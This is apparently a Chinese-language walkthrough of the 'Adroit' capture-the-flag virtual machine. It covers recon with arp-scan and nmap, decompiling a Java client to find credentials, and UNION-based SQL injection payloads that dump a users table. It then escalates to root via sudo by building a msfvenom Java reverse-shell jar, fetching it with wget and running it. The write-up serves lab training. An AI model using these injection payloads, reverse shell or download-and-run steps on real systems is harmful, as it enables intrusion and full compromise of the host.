adroit java反编译

环境准备

靶机链接:百度网盘 请输入提取码

提取码:4e5y

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.探测目标靶机ip地址

arp-scan -l

adroit java反编译_第1张图片

2.用nmap探测靶机开放端口和服务情况

nmap -p- -A -T4 192.168.1.100

adroit java反编译_第2张图片

漏洞利用

1.用一下ftp ,发现一个note.txt 和一个java文件 ,直接下载

adroit java反编译_第3张图片

2.用jd-gui 对 java文件查看 ,

adroit java反编译_第4张图片

3.添加到hosts后刷新!

adroit java反编译_第5张图片

4.仔细看文件 发现用户名密码

username=zeus password=god.thunder.olympus

adroit java反编译_第6张图片

5.启用这个java文件的时候发现SQL注入漏洞

5 union select null, database() //查数据库

5 union select null, group_concat(table_name) from information_schema.tables where table_schema = 'adroit' //查表名

adroit java反编译_第7张图片

5 union select null, group_concat(column_name) from information_schema.columns where table_schema = 'adroit' and table_name ='users' //查列

5 union select null, group_concat(username, ';', password) from adroit.users

writer;l4A+n+p+xSxDcYCl0mgxKr015+OEC3aOfdrWafSqwpY= //得到用户名密码是加密信息

adroit java反编译_第8张图片

adroit java反编译_第9张图片

6.由于无法进行base64解密,

unzip adroitclient.jar.src.zip -d adroitclient 解压下来

adroit java反编译_第10张图片

7.对获得的加密字符串进行解密,解密的核心代码主要是Cryptor.class文件中的decrypt函数,解密后得到密码just.write.my.ideas

adroit java反编译_第11张图片

权限提升

1.登录ssh

ssh [email protected] password=just.write.my.ideas

adroit java反编译_第12张图片

2.sudo -l 发现testingmyapp.jar 能够用root权限执行这个jar包

adroit java反编译_第13张图片

3.那我们就可以生成一个进行shell反弹的java包testingmyapp.jar。这里可以使用msf本地生成一个jar包,并上传到靶机,给777权限并且把名字改为testingmyapp.jar,开启监听,反弹shell。

msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f jar > shell.jar
python3 -m http.server
wget http://192.168.1.105:8000/shell.jar
chmod 777 shell.jar
mv shell.jar testingmyapp.jar
sudo /usr/bin/java -jar /tmp/testingmyapp.jar

adroit java反编译_第14张图片

你可能感兴趣的:(Walkthrough系列,java,开发语言,web安全,服务器,漏洞复现)